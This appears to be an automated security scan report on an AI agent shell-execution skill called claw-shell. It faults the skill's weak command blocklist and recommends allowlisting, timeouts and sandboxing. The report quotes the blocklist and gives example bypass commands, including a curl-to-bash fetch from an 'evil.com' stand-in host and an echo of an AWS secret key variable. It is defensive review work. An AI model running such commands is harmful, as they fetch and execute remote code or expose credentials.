Suspicious: risk score 48/100
Last scanned: 1 day ago
claw-shell
Run shell commands inside tmux session for AI agent interaction
Shell execution tool with declared purpose but weak safety filter that can be bypassed, allowing potentially destructive commands.
Skill name: claw-shell
Analysis time: 34.6s
Engine: pi
Use with caution
Add more comprehensive command validation, use allowlist approach instead of blocklist, add timeout limits, and consider sandboxing tmux session.

Security findings: 4

Severity Finding Location
High
Unrestricted shell execution with weak safety controls (Code execution)
The skill uses execSync to execute arbitrary shell commands with only a basic blocklist filter. The filter in isDangerous() can be bypassed with variations like 'rmdir', uppercase commands, or piped remote scripts.
const bad = ['sudo', ' rm ', ' rm-', 'reboot', 'shutdown', 'mkfs', 'dd '];
→ Implement allowlist approach for commands or use more comprehensive validation. Add command timeouts and resource limits.
handler.js:18
Medium
Dangerous commands bypass filter (Code execution)
Commands like 'rmdir', 'chmod 777', '> file' redirection, or 'curl http://evil.com|bash' are not blocked by the current filter.
const bad = ['sudo', ' rm ', ' rm-', 'reboot', 'shutdown', 'mkfs', 'dd '];
→ Add coverage for more dangerous operations including file permissions, network downloads, and recursive deletion.
handler.js:18
Medium
Indirect environment variable access (Sensitive access)
While not explicitly accessing environment, the shell execution allows reading $API_KEY, $SECRET, etc. via commands like 'echo $AWS_SECRET_KEY'
execSync(`tmux send-keys -t claw "${escaped}" C-m`);
→ Consider sanitizing commands that query environment variables or restrict to specific paths.
handler.js:14
Low
No command timeout configured (Code execution)
execSync calls have no timeout specified, allowing commands to hang indefinitely.
await new Promise(r => setTimeout(r, 500));
→ Add timeout option to execSync calls.
handler.js:29
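| Resource type | Declared permission | Inferred permission | Status | Evidence |
|---|---|---|---|---|
| Command execution | WRITE | WRITE | ✓ Consistent | execSync used in handler.js:1,7,10 |
| File system | WRITE | WRITE | ✓ Consistent | Shell can execute any file operation |
| Network access | WRITE | WRITE | ✓ Consistent | Shell can execute curl/wget/netcat |
| Environment variables | NONE | READ | ✓ Consistent | Shell commands can read $ENV vars |
| Clipboard | NONE | NONE | | |
| Browser | NONE | NONE | | |
| Database | NONE | NONE | | |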
1 finding
Medium: External URL
https://x.com/...
SKILL.md:39

Directory structure

3 files · 2.4 KB · 106 lines
JavaScript 1f · 57L Markdown 1f · 44L JSON 1f · 5L
├─ 📋 _meta.json JSON 5L · 129 B
├─ 📜 handler.js JavaScript 57L · 1.4 KB
└─ 📝 SKILL.md Markdown 44L · 928 B

Security highlights

✓ Purpose and capabilities are clearly documented in SKILL.md
✓ Uses dedicated tmux session 'claw' for isolation
✓ Basic safety filter exists for clearly dangerous commands
✓ No hidden functionality or obfuscation detected
✓ No credential harvesting or data exfiltration observed
✓ Single-purpose tool with focused functionality